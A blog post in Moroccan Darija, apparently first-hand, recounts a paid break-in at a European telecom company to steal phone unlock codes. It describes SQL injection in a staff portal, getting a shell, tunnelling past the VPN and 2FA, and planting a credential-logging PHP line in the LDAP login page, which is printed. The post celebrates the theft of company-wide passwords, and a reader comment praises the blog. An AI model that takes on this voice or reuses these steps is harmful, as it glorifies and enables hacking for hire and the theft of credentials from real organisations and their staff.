هادي واحد 5 سنوات تطرح عليا هدف فيه فلوس، شركة اتصالات فدولة اوروبية ، عندها واحد Database فيها الUnlock codes ديال التيليفونات اللي كتبيع، عندي واحد خدام لداخل جابليا عنوان intranet portal, و ما كاين لا login لا password…و باش تدخل من برا خاصك تدوز من CISCO SSL VPN و بال2FA…
بديت كنخمم و ندور على IP’S ديال الشركة، دور يا ما تدور و انا نطيح على واحد الPortal ديال العاملين، فيه اخبار و blog و فيه واحد البلاصة فين العاملين كيشوفو العطلات ديالهم، نظرة بسيطة لقيت انه Apache + php5 و فيه ثقبة ديال sql injection، جبدت الbdو دخلت للadmin طلعت shell و شفت الnetwork interfaces.
بينغو!! كنلقى عندو 2, وحدة مكونيكطيا مع الأنترنت الخارجي و وحدة من intranet 🤗🤗, اش عندير دابا؟
جبدت هاد السلاح الخطير http://http-tunnel.sourceforge.net
هادا بمثابة proxy عن طريق الhttp, قدرت نشوف بيه داك الportal واخا هو مور حماية بvpn و 2fa و سيدي بوزكري و ما كلاتش!!
واخا ها حنا وصلنا، و كيفاش غندخلو للportal?
رجعت لحلقة الوصل منين بديت، لقيت انه كاين 2 portals, ديال الأخبار اللي apache + php + mysql
و واحد ديال العطل apache + php + ldap!!!!
تما غنعرف انه الشبكة بكمالها خدامة ب Ldap Authentication!!!
كيف ما كتعرفو ldap راه كيسطوكي الpassword بSSHA256 و صعب بزاف انك تكراكيه، غتقدر تشوف معلومات المستعملين و الprivileges ديالهم لكن عمرك تحلم بشي plaintext password..😥😥
تما طاحت عليا فكرة جهنمية، مقودة 😃 :
مشيت لlogin page ديال الportal و زدت فيها لعيبة صغيرة فحال هاكدا
$a=$_POST["username"];$tajine=fopen('7selto.txt',"a");($_POST["username"]);fwrite($tajine,a);fclose($tajine);
و هادي خلاتني ف24 ساعة ندير يدي على الشركة بأكملها بما فيها رئيس القسم الأمني اللي خلا الpass ديالو تما و عندو گاع الprivileges 🤗.
التخربيقولوجيا بالدارجة 
تطواني
البلوك ديالك مفيد جدا جدا كمل الله يسخر
إعجابإعجاب